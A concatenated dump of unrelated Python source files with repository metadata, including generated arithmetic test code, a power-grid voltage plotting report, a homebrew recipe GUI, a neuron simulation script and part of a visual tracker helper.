var33 = ((arg11 & var31) & var31) | var32
else:
var33 = var31 + var13
if var32 < arg12:
var34 = (var30 - arg12) + (var30 ^ arg11 & arg12 - var13 - arg12 ^ -742 & var32 ^ var32 & arg11 & var31 & arg11 - (var13 | 880642707 - (var13 | (553 & var13 - -534 | var31)) ^ -1201025472 | arg11))
else:
var34 = var13 | (var30 & arg12) ^ var13
result = var32 & -275 - arg12
return result
def func11(arg14, arg15):
var16 = 358 - 167 + 875051580 ^ 348
if arg14 < arg14:
var17 = arg15 ^ (590993375 | -546) + 293
else:
var17 = arg15 | 86
var18 = (arg15 - arg15) ^ arg14 & -903868833
var19 = 457 - var16
if var19 < var19:
var20 = -562 ^ (arg15 - arg15)
else:
var20 = 143840302 | (var16 & var16) - arg15
var21 = arg14 & 906
var22 = var16 & 936622172 + var19 | arg14
var23 = var22 + var22 - var22 - var18
if var19 < arg15:
var24 = 867142190 ^ (var21 ^ -49844891 + var23)
else:
var24 = ((332 ^ var16) | arg14) + var19
var25 = var21 ^ var22
var26 = -377 ^ var19
var27 = (var16 ^ var26) + var16 ^ 1618868888
var28 = arg14 | (var21 + -558) ^ var27
var29 = var22 & var16 ^ var23 + arg14
result = (var23 & var25) & (var16 | var18)
return result
def func10():
func8()
result = len((((i | ((6 - 4) ^ 6)) - -4 ^ (6 ^ (3 | 1 | -8) - 6 + -3)) | 3 for i in range(35)))
func9()
return result
def func9():
global len
del len
def func8():
global len
len = lambda x : -6
def func6(arg9, arg10):
var35 = func7(arg10, 375)
yield var35
var36 = arg9 | -932 + 952
yield var36
var37 = var36 + -721 - -1482373484 - -323
yield var37
var38 = 58 | -1299279161
yield var38
var39 = 414 | var36 + arg9 ^ arg9
yield var39
var40 = arg9 | var39
yield var40
var41 = var38 ^ 841504964 | var40 ^ arg9
yield var41
var42 = arg10 ^ (var40 | 970864904 - -241)
yield var42
var43 = -10 + var39 | var38 + arg10
yield var43
var44 = arg10 & var38
yield var44
var45 = var38 & (var39 | arg9 | var37)
yield var45
class class4(object):
def func3(self, arg5, arg6):
return 0
class class2(object):
def func3(self, arg3, arg4):
result = arg3 + (((1 + -1) | arg3 ^ -440174602) - 1979601014) + 1
return result
def func49(arg297, arg298):
def func50(acc, rest):
var299 = -5 - -5 & rest
if acc == 0:
return var299
else:
result = func50(acc - 1, var299)
return result
result = func50(10, 0)
return result
if __name__ == "__main__":
print('prog_size: 5')
print('func_number: 12')
print('arg_number: 58')
for i in range(25000):
x = 5
x = func1(x, i)
print(x, end='')
print('prog_size: 5')
print('func_number: 24')
print('arg_number: 125')
for i in range(25000):
x = 5
x = func12(x, i)
print(x, end='')
print('prog_size: 5')
print('func_number: 34')
print('arg_number: 196')
for i in range(25000):
x = 5
x = func24(x, i)
print(x, end='')
print('prog_size: 5')
print('func_number: 44')
print('arg_number: 289')
for i in range(25000):
x = 5
x = func34(x, i)
print(x, end='')
print('prog_size: 5')
print('func_number: 54')
print('arg_number: 323')
for i in range(25000):
x = 5
x = func44(x, i)
print(x, end='') | UTF-8 | Python | false | false | 19,976 | py | 25,849 | 6eac9828-3287-4eac-9bec-53387285494c.py | 25,848 | 0.582549 | 0.313877 | 0 | 553 | 35.124774 | 227 |
dheerajgupta0001/wrldc_mis_monthly_report_generator | 19,181,323,961,168 | 0174b245119bdd3a8f9be1423610a54325fc4a8f | 27e6a0f12334076bca2281d501453f90b7762eb0 | /src/app/section_1_7/section_1_7_3.py | fc59148efefc60abd7ebf0460021af26ec205f1e | [
"MIT"
]
| permissive | https://github.com/dheerajgupta0001/wrldc_mis_monthly_report_generator | 44491d0488620426a191dc52d1317f8756274170 | dd5ae6f28ec6bf8e6532820fd71dd63f8b223f0b | refs/heads/main | 2023-06-20T08:14:19.928757 | 2021-07-20T05:55:39 | 2021-07-20T05:55:39 | 338,298,197 | 0 | 0 | MIT | false | 2021-03-24T05:36:40 | 2021-02-12T11:22:11 | 2021-03-03T07:57:48 | 2021-03-24T05:36:39 | 29,507 | 0 | 0 | 0 | Python | false | false | import datetime as dt
from src.repos.metricsData.metricsDataRepo import MetricsDataRepo
import pandas as pd
from src.app.section_1_7.section_1_7_2 import strip400
from src.app.section_1_7.section_1_7_1 import strip765
from src.typeDefs.section_1_7.section_1_7_3 import ISection_1_7_3
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
def fetchSection1_7_3Context(appDbConnStr: str, startDt: dt.datetime, endDt: dt.datetime) -> ISection_1_7_3:
fullMonthName = dt.datetime.strftime(startDt, "%b' %Y")
mRepo = MetricsDataRepo(appDbConnStr)
metrics = ["Max", "Min"]
lvls = [400, 765]
numPltsPerPage = 6
numPages = 0
for m in metrics:
for l in lvls:
voltData = mRepo.getDailyVoltDataByLevel(l, m, startDt, endDt)
voltDf = pd.DataFrame(voltData)
voltDf["data_val"] = pd.to_numeric(
voltDf["data_val"], errors='coerce')
voltDf = voltDf.pivot(index="data_time", columns="entity_name",
values="data_val")
if l == 400:
voltDf.columns = [strip400(x) for x in voltDf.columns]
elif l == 765:
voltDf.columns = [strip765(x) for x in voltDf.columns]
lowThresh = 300 if l == 400 else 650
voltDf[voltDf < lowThresh] = np.nan
numStations = voltDf.shape[1]
pageStartStnInd = 0
while pageStartStnInd < numStations:
pageEndStnInd = pageStartStnInd + numPltsPerPage
if pageEndStnInd >= numStations:
pageEndStnInd = numStations-1
# create a plotting area and get the figure, axes handle in return
fig, ax = plt.subplots(figsize=(7.5, 4.5))
pltTitle = "{0}. Voltage Profile during the month of {1} - {2} kV S/S".format(
m, fullMonthName, l)
# set plot title
ax.set_title(pltTitle)
# set x and y labels
ax.set_xlabel('Date')
ax.set_ylabel('kV')
#c0c0c0
ax.set_facecolor("#c0c0c0")
# enable y axis grid lines
ax.yaxis.grid(True)
for stnIter in range(pageStartStnInd, pageEndStnInd+1):
stnName = voltDf.columns[stnIter]
la, = ax.plot(
voltDf.index.values, voltDf[stnName].values, linestyle='solid', marker='.')
la.set_label(stnName)
# set x axis locator as day of month
ax.set_xlim((startDt, endDt), auto=True)
ax.xaxis.set_major_locator(mdates.DayLocator())
# set x axis formatter as month name
ax.xaxis.set_major_formatter(mdates.DateFormatter('%d'))
# enable legends
ax.legend(bbox_to_anchor=(0.0, -0.3, 1, 0), loc='lower center',
ncol=numPltsPerPage, mode="expand", borderaxespad=0.)
fig.subplots_adjust(bottom=0.2, left=0.07, right=0.99)
fig.savefig('assets/section_1_7_3_{0}.png'.format(numPages))
numPages += 1
pageStartStnInd = pageEndStnInd + 1
sectionData: ISection_1_7_3 = {'num_plts_sec_1_7_3': numPages}
return sectionData
| UTF-8 | Python | false | false | 3,376 | py | 90 | section_1_7_3.py | 88 | 0.561315 | 0.530806 | 0 | 71 | 46.549296 | 108 |
RenatoBoeno/exercicios-de-estudo-python | 11,940,009,089,161 | fb2e5824434bcb935273ecf5db35cab738b9d975 | d4acc74ed78675f6657ee73e4ed395c45e2f47a1 | /Exercícios de estudo Python/018 - Seno, Cosseno e Tangente.py | 7474f867cf7eb157720469b6f6072ebbcdbfb0f6 | []
| no_license | https://github.com/RenatoBoeno/exercicios-de-estudo-python | 72f5ac74544423d0d3ff18da5ad2325d9dff9412 | bc1f1c17cd3f323f7f29dae9653f939c69998511 | refs/heads/master | 2020-05-16T15:03:09.429085 | 2019-04-25T16:09:58 | 2019-04-25T16:09:58 | 183,120,450 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
an = float(input("digite o angulo que deseja:"))
seno = math.sin(math.radians((an)))
print ("angulo{:.2f} seno {:.2f}".format(an,seno))
cosseno = math.cos(math.radians((an)))
print(" o angulo de {:.2f} tem o cosseno{:.2f}".format(an,cosseno))
tangente = math.tan(math.radians(an))
print(" o angulo é {:.2f} tem a tangente{:.2f}".format(an,tangente)) | UTF-8 | Python | false | false | 362 | py | 46 | 018 - Seno, Cosseno e Tangente.py | 46 | 0.67313 | 0.65651 | 0 | 8 | 44.25 | 68 |
cafischer/cell_fitting | 17,085,379,945,832 | db46a16978e63e708086a746af6b82640b358a05 | 032a1ad3c94e1126729417a16e2a95743d121244 | /cell_fitting/optimization/evaluation/plot_sine_stimulus/plot_sine_stimulus.py | 6e1f5cca9c146e3587a73f2e1f6142e496418b59 | []
| no_license | https://github.com/cafischer/cell_fitting | 0fd928f5ae59488e12c77648c2e6227c1911d0e9 | 75a81987e1b455f43b5abdc8a9baf6b8f863bee2 | refs/heads/master | 2021-01-23T19:27:30.635173 | 2019-09-14T08:46:57 | 2019-09-14T08:46:57 | 44,301,986 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import division
import matplotlib.pyplot as pl
import numpy as np
from nrn_wrapper import Cell
import os
import json
from cell_fitting.optimization.evaluation.plot_sine_stimulus import simulate_sine_stimulus
pl.style.use('paper')
if __name__ == '__main__':
# parameters
save_dir = '/home/cf/Phd/programming/projects/cell_fitting/cell_fitting/results/best_models/6'
model_dir = os.path.join(save_dir, 'cell.json')
mechanism_dir = '../../../model/channels/vavoulis'
# load model
cell = Cell.from_modeldir(model_dir, mechanism_dir)
# apply stim
amp1 = 0.4 # 0.5
amp2 = 0.2 # 0.2
freq1 = 0.1 # 0.5: 1000, 0.25: 2000, 0.1: 5000, 0.05: 10000
sine1_dur = 1./freq1 * 1000 / 2
freq2 = 5 # 5 # 20
onset_dur = offset_dur = 500
dt = 0.01
sine_params = {'amp1': amp1, 'amp2': amp2, 'sine1_dur': sine1_dur, 'freq2': freq2, 'onset_dur': onset_dur,
'offset_dur': offset_dur, 'dt': dt}
v, t, i_inj = simulate_sine_stimulus(cell, amp1, amp2, sine1_dur, freq2, onset_dur, offset_dur, dt)
# plot
save_dir_img = os.path.join(save_dir, 'img', 'sine_stimulus', 'traces',
str(amp1)+'_'+str(amp2)+'_'+str(freq1)+'_'+str(freq2))
if not os.path.exists(save_dir_img):
os.makedirs(save_dir_img)
np.save(os.path.join(save_dir_img, 'v.npy'), v)
np.save(os.path.join(save_dir_img, 't.npy'), t)
np.save(os.path.join(save_dir_img, 'i_inj.npy'), i_inj)
with open(os.path.join(save_dir_img, 'sine_params.json'), 'w') as f:
json.dump(sine_params, f)
pl.figure()
#pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2), fontsize=16)
pl.plot(t, v, 'r', linewidth=1)
pl.xlabel('Time (ms)')
pl.ylabel('Membrane Potential (mV)')
pl.tight_layout()
pl.savefig(os.path.join(save_dir_img, 'v.png'))
pl.show()
# pl.figure()
# pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2), fontsize=16)
# pl.plot(t, v, 'r', linewidth=1)
# pl.xlabel('Time (ms)')
# pl.ylabel('Membrane Potential (mV)')
# pl.xlim(4000, 6000)
# pl.tight_layout()
# pl.savefig(os.path.join(save_dir_img, 'v_zoom.png'))
# pl.show()
# # plot influence of input current
# from cell_fitting.optimization.helpers import *
# L = cell.soma.L # um
# diam = cell.soma.diam # um
# cm = cell.soma.cm # uF/cm**2
# dt = t[1] - t[0] # ms
# dvdt = np.concatenate((np.array([(v[1] - v[0]) / dt]), np.diff(v) / dt)) # V
#
# # convert units
# cell_area = get_cellarea(convert_from_unit('u', L),
# convert_from_unit('u', diam)) # m**2
# Cm = convert_from_unit('c', cm) * cell_area # F
# i_inj_c = convert_from_unit('n', np.array(i_inj)) # A
#
# i_ion = -1 * (dvdt * Cm - i_inj_c) # A
#
# simulation_params = {'sec': ('soma', None), 'i_inj': i_inj, 'v_init': -75, 'tstop': sine1_dur+1000,
# 'dt': dt, 'celsius': 35, 'onset': 200}
# from cell_fitting.optimization.simulate import simulate_currents
# currents, channel_list = simulate_currents(cell, simulation_params)
#
# i_ion_from_currents = 10 * np.sum(currents) * cell_area
#
# pl.figure()
# #pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2))
# pl.plot(t, dvdt * Cm, 'k', label='$c_m dV/dt$')
# pl.plot(t, i_ion, 'r', label='$I_{ion}$')
# #pl.plot(t, i_ion_from_currents, 'k', label='$I_{ion} from currents$')
# pl.plot(t, i_inj_c, 'b', label='$I_{inj}$')
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.ylim(-1.5*1e-9, 1.5*1e-9)
# pl.xlim(1850, 2050)
# pl.xlabel('Time (ms)')
# pl.ylabel('Current (A)')
# pl.legend()
# pl.tight_layout()
# pl.show()
#
# # plot currents
# pl.figure()
# for c, current in enumerate(currents):
# pl.plot(t, -1*current, label=channel_list[c])
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.xlim(1850, 2050)
# pl.ylim(-0.15, 0.15)
# pl.legend()
# pl.tight_layout()
# pl.show()
#
# channel_list = np.array(channel_list)
# pl.figure()
# pl.plot(t, -1 * currents[channel_list == 'nat'][0] + -1*currents[channel_list == 'kdr'][0]+-1 * currents[channel_list == 'pas'][0], label='nat + kdr + pas')
# pl.plot(t, -1 * currents[channel_list == 'nap'][0] + -1*currents[channel_list == 'kdr'][0]+-1 * currents[channel_list == 'pas'][0], label='nap + kdr + pas')
# pl.plot(t, -1 * currents[channel_list == 'pas'][0], label='pas')
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.xlim(1850, 2050)
# pl.ylim(-0.15, 0.15)
# pl.legend()
# pl.tight_layout()
# pl.show() | UTF-8 | Python | false | false | 4,926 | py | 374 | plot_sine_stimulus.py | 295 | 0.556638 | 0.510556 | 0 | 123 | 39.056911 | 162 |
minuptt/HCMC_Scores_2020 | 7,507,602,862,821 | 737607594f49fb282b536de319f780994e611139 | 5999eda4fb021305efb6c4833ccbdedd31d3334f | /problem1.py | 03690170bedd0338244d649e4b2c3a29cba6e898 | []
| no_license | https://github.com/minuptt/HCMC_Scores_2020 | 6e65de8a2137607dcdc4e3ada62890067ed3ceff | 1fd495ff8032789621f2c04574831af77cd77e89 | refs/heads/master | 2023-07-07T09:53:42.597414 | 2021-07-29T23:51:56 | 2021-07-29T23:51:56 | 390,868,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # read file
with open("clean_data.csv", encoding = "utf8") as file:
data = file.read().split("\n")
header = data[0]
students = data[1:]
students.pop()
total_student = len(students)
header = header.split(",")
subjects = header[5:]
for i in range (total_student):
students[i] = students[i].split(",")
not_take_exam = [0,0,0,0,0,0,0,0,0,0,0]
for s in students:
for i in range (5,16):
if s[i] == "-1":
not_take_exam[i-5] += 1
not_take_exam_percentage = [0,0,0,0,0,0,0,0,0,0,0]
for i in range (0,11):
not_take_exam_percentage[i] = round(not_take_exam[i]*100/total_student, 2)
import matplotlib.pyplot as plt
import numpy as np
figure, axis = plt.subplots()
y_pos = np.arange(len(subjects))
axis.set_ylim(0,100)
plt.bar(y_pos, not_take_exam_percentage)
plt.xticks(y_pos, subjects)
plt.ylabel('Percentage')
plt.title('Not taking exam or not registering on subject')
rects = axis.patches
for rect, label in zip(rects, not_take_exam):
height = rect.get_height()
axis.text(rect.get_x() + rect.get_width() / 2, height + 2, label, ha = 'center', va = 'bottom')
plt.show()
| UTF-8 | Python | false | false | 1,117 | py | 8 | problem1.py | 7 | 0.644584 | 0.604297 | 0 | 43 | 24.930233 | 99 |
ricardobtxr/experiment-scripts | 12,987,981,122,941 | e304b0d9a196a6d4e9d4c6173756dc1090f20cc6 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py | 8f6222df4dd6d8bce8e0d235fb7a22a1d8bdd99c | []
| no_license | https://github.com/ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | -X FMLP -Q 0 -L 5 110 400
-X FMLP -Q 0 -L 5 95 300
-X FMLP -Q 1 -L 2 44 150
-X FMLP -Q 1 -L 2 40 175
-X FMLP -Q 2 -L 1 38 150
-X FMLP -Q 2 -L 1 33 125
-X FMLP -Q 3 -L 1 26 250
25 125
23 250
22 300
20 100
14 125
10 125
| UTF-8 | Python | false | false | 239 | py | 6,754 | sched.py | 6,466 | 0.539749 | 0.205021 | 0 | 13 | 17.384615 | 28 |
timaakulich/django_telegram_bots | 39,026 | fec17d696119b8312ed4f29c472e579d32dd9426 | c824fba398787231aeca3b4735796ae04b194b98 | /bots/migrations/0009_auto_20161002_1050.py | a020ce078a841784a82cac5d8cee61dfa8349555 | []
| no_license | https://github.com/timaakulich/django_telegram_bots | 475635426fdabdc44f1735a642df2a3ebf3a1cfb | d9296c6eb34be6326fbf46f2909aa57521319971 | refs/heads/master | 2018-01-02T08:01:16.985301 | 2016-10-02T11:37:16 | 2016-10-02T11:37:16 | 69,358,186 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-02 10:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bots', '0008_auto_20160928_1746'),
]
operations = [
migrations.AddField(
model_name='botcommand',
name='command_type',
field=models.CharField(choices=[('message', 'Message'), ('photo', 'Photo'), ('document', 'Document'), ('location', 'Location'), ('sticker', 'Sticker')], default='message', max_length=10, null=True),
),
migrations.AlterField(
model_name='botcommand',
name='source',
field=models.TextField(help_text='Write your code here. You can use variables from "variables" field. Also you have access to "bot", "message", "command_params" variables.'),
),
]
| UTF-8 | Python | false | false | 909 | py | 12 | 0009_auto_20161002_1050.py | 11 | 0.607261 | 0.568757 | 0 | 25 | 35.36 | 210 |
gitGNU/gnu_brewtools | 3,513,283,269,773 | eec5e35d0b79d066a5aa1a0e58cb68210d5aec90 | 19c7a026d7222fd50f8816370dafb19cc979e237 | /gui/wndRecipe.py | 0e03d710f1f8e6992e396529aee4e4ee6a8e95f5 | [
"BSD-3-Clause"
]
| permissive | https://github.com/gitGNU/gnu_brewtools | 1ba8c9e75e17a151dfddb63dfca90927b4a78df9 | ba09dc11e23d93e623f497286f3f2c3e9aaa41c2 | refs/heads/master | 2023-08-06T06:34:26.551798 | 2008-05-08T22:00:49 | 2008-05-08T22:00:49 | 90,340,617 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
* Copyright (c) 2008, Flagon Slayer Brewery
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of the Flagon Slayer Brewery nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY Flagon Slayer Brewery ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL Flagon Slayer Brewery BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import pygtk
pygtk.require("2.0")
import gtk, gtk.glade
from recipe import*
from obj_manager import*
from util import*
from wndRecipeProcedure import*
class RecipeWindow:
"""
#########################################################################
# Author: Reuben Otero #
# Created: March 26, 2008 #
# Modified: April 10, 2008 #
#-----------------------------------------------------------------------#
# Class: RecipeWindow #
# Opens the GUI window to create and store a new #
# Recipe into the application. Creates the button #
# handlers and has the functions to support them. #
#-----------------------------------------------------------------------#
# Sub-Class: ProcedureWindow #
# Opens the GUI window to create and store a new #
# Procedures into the new Recipe Object. Creates the button #
# handlers and has the functions to support them. #
#-----------------------------------------------------------------------#
# Support Classes: #
# Imports recipe.py #
# creates and stores new recipe information #
# Imports obj_manager #
# class file to handle all objects created #
# sub-classed with Indexer.py #
#-----------------------------------------------------------------------#
# Indexer: #
# Uses Indexer class sub-class through ojb_manager #
# Uses include createing and destroying objects #
# #
# 'Create an object' #
# Variable = self.indexer.get(ObjectClass, 'NameofObject) #
# #
# 'Delete an oject' #
# Variable = None #
# self.indexer.deleteObject(ObjectClass, 'NameofObject') #
#-----------------------------------------------------------------------#
"""
#Global Varialbles
Ammountlbl = ""
NewRecipe = None
"""
create indexer to communicate with recipe.py
self.'NAME' = Indexer()----creates an indexer
"""
def __init__(self):
"""
Constructor saves the recipe.glade file
Creates an indexer to use for creating and saving a recipe object
"""
self.gladefile = 'gui/recipe.glade'
#Global Varialbles
#IndexRecipe may be used to store an index number for Recipe objects
self.IndexRecipe = Recipe_Get_New_index()
#create new Recipe object to hold recipe. Unique key is name of
#object. Object is created as soon as the window opens
#Currently just using the name 'Test Recipe' input for name of
#recipe by user. Possibly will change to use an automated system So only
#creates one recipe object that is reuse every time the program is ran.
self.indexer = Indexer()
def run(self, Edit):
self.wTree = gtk.glade.XML(self.gladefile, 'wndRecipe')
#dictionary of Handlers for events in Recipe GUI window
#including the method function to support that handle
# dic = {"Button Handler Name": sef.CorresondingFunctionTitle}
dic = { #"wndRecipe_close_cb" : self.ObjectDelete,
"btnFinish_click_cb" : self.lookAtFields,
"btnCancelForm_click_cb" : self.Exit,
"btnClearForm_click_cb" : self.clearAllFields,
"btnAddIngrd_clicked_cb" : self.Ingredients,
"btnProcedures_clicked_cb" : self.Procedures,
#"btnEdit_Ingredients_clicked_cb" : self.EditIngredients,
#"btnEditProcedures_clicked_cb" : self.EditProcedures,
#"wndRecipe_destroy_cb" : self.Exit,
}
#send dictionary of hanles to GUI
self.wTree.signal_autoconnect(dic)
#set window GUI for Recipe and open
self.wind = self.wTree.get_widget('wndRecipe')
self.setTrees()
#check to see if an ojbect was sent to be edit
if Edit:
self.TempNewRecipe = Edit
self.Editing = True
self.PopulateRecipe()
self.PopulateTrees(True, True)
print 'Recieve Recipe Object to edit'
else:
self.TempNewRecipe = self.indexer.get(Recipe, 'New Recipe')
self.Editing = False
print 'No Recipe Object passed to edit'
self.wind.show_now()
#-----------------------------------------------------------------------------------------------------------------------------
#Function to support the trees for ingredients and procedures
def setTrees(self, callback=None):
#create a tree list to hold ingredients
self.treRecipe_Ingredients = self.wTree.get_widget('treRecipe_Ingredients')
self.Recipe_Ingredient_List = setupList(self.treRecipe_Ingredients, ['Name','Type', 'Amount'], (str,str,str))
self.treRecipe_Procedures = self.wTree.get_widget('treRecipe_Procedures')
self.Recipe_Procedures_List = setupList(self.treRecipe_Procedures, ['Name', 'Time'], (str,str,))
def PopulateRecipe(self):
"""
Populate all the fields of the Recipe.
"""
self.wTree.get_widget('txtRecipeName').set_text(self.TempNewRecipe.name)
self.wTree.get_widget('txtRecipeStyle').set_text(self.TempNewRecipe.style)
self.wTree.get_widget('txtBatchSize').set_text(self.TempNewRecipe.batch_size)
self.wTree.get_widget('txtBoilTime').set_text(self.TempNewRecipe.boil_time)
self.PopulateTrees(True, True)
def PopulateTrees(self, Ingd, Proc):
if Proc:
self.Recipe_Procedures_List.clear()
for i in self.TempNewRecipe.Procedures:
self.Recipe_Procedures_List.insert(0,[i.name, "%s %s" % (i.timing_delta, i.time_unit)])
if Ingd:
self.Recipe_Ingredient_List.clear()
for i in self.TempNewRecipe.RecipeIngredients:
self.Recipe_Ingredient_List.append([i.name, i.__class__.__name__,
"%s %s" % (i.recipeAmount, i.stockUnit)])
#-----------------------------------------------------------------------------------------------------------------------------
#Functions to support the new recipe window when creating a new window.
def Procedures(self, callback):
"""
Call Procedures() sub-class.
"""
#call Procedures class
self.procedure = ProcedureWindow()
if self.Editing:
self.procedure.run(self.TempNewRecipe, self.Editing)
else:
self.procedure.run(self.TempNewRecipe)
#re-populate the procedure tree
self.PopulateTrees(False, True)
def Ingredients(self, callback):
"""
Call the Ingredient class to handle adding ingredients to the new recipe
Call the Ingredient class to handle edits to the ingredients stored in new recipe
If Editing send the new recipe object and True to the Ingredient class
Else just send the new recipe object
"""
self.ingredients = IngredientWindow()
if self.Editing:
self.ingredients.run(self.TempNewRecipe, self.Editing)
else:
self.ingredients.run(self.TempNewRecipe)
#re-populate the ingredients tree
self.PopulateTrees(True, False)
def lookAtFields(self,callback):
"""
Function that supports the Finish button.
Function stores and creaates new Recipe Object using The indexer
created in the constructor.
---------------------------------------------------------------
See Indexer: above for notes
Use a variable to store index object
Manipulate object variables or use functions as
Variable = self.indeser.get.........
Variable.ObjectClassVariable = such and such
Variable.ObjectClassFunction()
"""
#create variable to hold text input fro GUI text boxes
RecipeNameBox = self.wTree.get_widget('txtRecipeName')
RecipeStyleBox = self.wTree.get_widget('txtRecipeStyle')
BatchSize = self.wTree.get_widget('txtBatchSize')
BoilTime = self.wTree.get_widget('txtBoilTime')
#ListofIngredients = self.Recipe_Ingredient_List.get_selection()
#Set Created Recipe Object variables to inputs
self.TempNewRecipe.name = RecipeNameBox.get_text()
self.TempNewRecipe.style = RecipeStyleBox.get_text()
self.TempNewRecipe.batch_size = BatchSize.get_text()
self.TempNewRecipe.boil_time = BoilTime.get_text()
#test purposes to see if function is read and used
print 'reach look at fields'
#test purposes to see if inputs are correct and stored
print self.TempNewRecipe.name, self.TempNewRecipe.style, self.TempNewRecipe.batch_size, self.TempNewRecipe.boil_time
#Create new recipe object to store the new recipe.
#Delete TempNewRecipe. For a new unique object is created
#to store the new recipe.
#If editing an object do not create a new object and bypass this code
if self.Editing:
print 'Not Editing No need to create new recipe object'
else:
self.NewRecipe = self.indexer.get(Recipe, self.TempNewRecipe.name)
self.NewRecipe.swapRecipeObjects(self.TempNewRecipe)
self.Exit()
#-----------------------------------------------------------------------------------------------------------------------------
#These functions work for both new recipe and edit recipe functionality.
def clearAllFields(self, callback):
"""
Function that supports the Clear All Recipe Form button.
Clears all text fields in the Recipe Form
"""
self.wTree.get_widget('txtRecipeName').set_text('')
self.wTree.get_widget('txtRecipeStyle').set_text('')
self.wTree.get_widget('txtBatchSize').set_text('')
self.wTree.get_widget('txtBoilTime').set_text('')
#clear the ingredient list tree
self.Recipe_Ingredient_List.clear()
self.Recipe_Procedures_List.clear()
for i in self.TempNewRecipe.RecipeIngredients:
self.TempNewRecipe.RecipeIngredients.Remove(i)
for i in self.TempNewRecipe.Procedures:
self.TempNewRecipe.Procedures.Remove(i)
print 'reach clear all fields'
def ObjectDelete(self, callback = None):
"""
Delete Recipe Object
"""
if self.Editing:
print 'editing an object no deletion necessary'
else:
self.indexer.deleteObject(Recipe, 'New Recipe')
self.TempNewRecipe = None
print 'Object TempNewRecipe Deleted'
def Exit(self, callback = None):
"""
Function to handle quit
"""
self.ObjectDelete()
self.wind.destroy()
#return self.TempNewRecipe
print 'exit Recipe'
| UTF-8 | Python | false | false | 11,163 | py | 18 | wndRecipe.py | 14 | 0.669802 | 0.6681 | 0 | 294 | 36.969388 | 126 |
xujinzh/CSK | 18,133,351,958,404 | 057464e6a48599770f4fa8d8f30752fec5238fc4 | 388365862871297770de5e7c717f7b2354a99936 | /utils/get_subwindow.py | 3a416373aabbdd5e4a5f474b3f715bfe5f9354ee | [
"BSD-2-Clause"
]
| permissive | https://github.com/xujinzh/CSK | fa66232f42db0f72da47dc83eac497e65077bd34 | 136002da069d300fc2da9ae8530861818087ff40 | refs/heads/main | 2023-01-06T08:33:05.706746 | 2020-11-13T10:22:10 | 2020-11-13T10:22:10 | 303,584,852 | 5 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Jinzhong Xu
# @Contact : jinzhongxu@csu.ac.cn
# @Time : 10/12/2020 2:23 PM
# @File : get_subwindow.py
# @Software: PyCharm
import pylab
import os
from matplotlib import image as mpimg
import numpy as np
from utils import rgb2gray
from matplotlib import pyplot as plt
def get_subwindow(im, pos, sz, cos_window):
"""
使用 replication padding 从图像中获得子窗口。子窗口以 [y, x] 为坐标中心,大小为 [height, width].
如果子窗口超过图像边界,则复制图像的边界像素值。获得的子窗口将使用余弦窗口标准化到 [-0.5, 0.5]
:param im: 输入图像
:param pos: 子窗口中心点坐标 [y, x]
:param sz: 子窗口大小 [height, width]
:param cos_window: 余弦子窗口矩阵
:return: 返回经过余弦子窗口截取的图像矩形框部分
"""
# 如果不是高、宽组成的数组,而是一个一维数值,则转化为一个数组
# 目标是子窗矩形化
if pylab.isscalar(sz): # square sub-window
sz = [sz, sz]
# 以 pos 为中心,以 sz 为窗口大小建立子窗
ys = pylab.floor(pos[0]) + pylab.arange(sz[0], dtype=int) - pylab.floor(sz[0] / 2)
xs = pylab.floor(pos[1]) + pylab.arange(sz[1], dtype=int) - pylab.floor(sz[1] / 2)
ys = ys.astype(int)
xs = xs.astype(int)
# 如果子窗超过坐标,则设置为边界值
ys[ys < 0] = 0
